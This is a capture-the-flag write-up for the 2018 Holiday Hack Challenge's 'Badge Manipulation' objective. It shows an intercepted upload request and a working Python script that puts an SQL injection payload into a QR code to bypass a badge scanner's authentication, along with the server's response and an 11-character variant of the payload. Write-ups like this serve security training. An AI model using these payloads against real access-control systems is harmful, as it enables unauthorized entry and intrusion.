Objective 6: Badge Manipulation

Difficulty: 3/5

Note: This objective is found on the top floor, up the stairs from the floor one Eastern corridor.

Bypass the authentication mechanism associated with the room near Pepper Minstix. A sample employee badge is available (https://www.holidayhackchallenge.com/2018/challenges/alabaster_badge.jpg).
What is the access control number revealed by the door authentication panel?

For hints on achieving this objective, please visit Pepper Minstix and help her with the Yule Log Analysis Cranberry Pi terminal challenge.
Note: Peppex Minstix can be found on Floor 1 in the far East corridor

Hints given:
https://www.owasp.org/index.php/SQL_Injection_Bypassing_WAF#Auth_Bypass
https://www.the-qrcode-generator.com/


The objective can be accessed directly via this link:
https://scanomatic.kringlecastle.com/index.html?challenge=qrcode&id=601b32cf-385e-4160-854c-03ee1efcf951


Fiddler can be used to intercept a request to the Scan-O-Matic server. The intercepted request looks like the request below

POST https://scanomatic.kringlecastle.com/upload HTTP/1.1
Host: scanomatic.kringlecastle.com
Connection: keep-alive
Content-Length: 214697
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://scanomatic.kringlecastle.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySeNIJHjjBbAK4FGg
Referer: https://scanomatic.kringlecastle.com/index.html?id=601b32cf-385e-4160-854c-03ee1efcf951
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: resource_id=601b32cf-385e-4160-854c-03ee1efcf951

------WebKitFormBoundarySeNIJHjjBbAK4FGg
Content-Disposition: form-data; name="barcode"; filename="alabaster_badge.png"
Content-Type: image/png

<DATA>
------WebKitFormBoundarySeNIJHjjBbAK4FGg--

The request can be replicated in Python using the code below

import requests
import qrcode
import io

# Create QR code PNG image
data = "2"
memfile = io.BytesIO()
img = qrcode.make(data)
img.save(memfile, format="png")
imgbytes = memfile.getvalue()

# HTTPS request
file = {'barcode': ('ho-ho-no.png', imgbytes, 'image/png')}
cookie = {'resource_id': '601b32cf-385e-4160-854c-03ee1efcf951'}
response = requests.post('https://scanomatic.kringlecastle.com/upload', files=file, cookies=cookie)

# HTTPS response
print(response.text)

The Scan-O-Matic is vulnerable to SQL injection and the Python script above only needs a small modification to trick the system and get access:

import requests
import qrcode
import io

# Create QR code PNG image
sqli = "' OR enabled#"
memfile = io.BytesIO()
img = qrcode.make(sqli)
img.save(memfile, format="png")
imgbytes = memfile.getvalue()

# HTTPS request
file = {'barcode': ('ho-ho-no.png', imgbytes, 'image/png')}
cookie = {'resource_id': '601b32cf-385e-4160-854c-03ee1efcf951'}
response = requests.post('https://scanomatic.kringlecastle.com/upload', files=file, cookies=cookie)

# HTTPS response
print(response.text)
root@kali:~# python scanomatic.py 
{"data":"User Access Granted - Control number 19880715","request":true,"success":{"hash":"e89bca297348a069809ccd84e765afbbdb856c9f9866fde165b783e5796854ff","resourceId":"601b32cf-385e-4160-854c-03ee1efcf951"}}

The server returned control number:
19880715

Some more trivia - the SQL injection for this objective can be quite small. What is the smallest injection you can come up with?

Show Answer
Here is a working injection using only 11 characters '||enabled#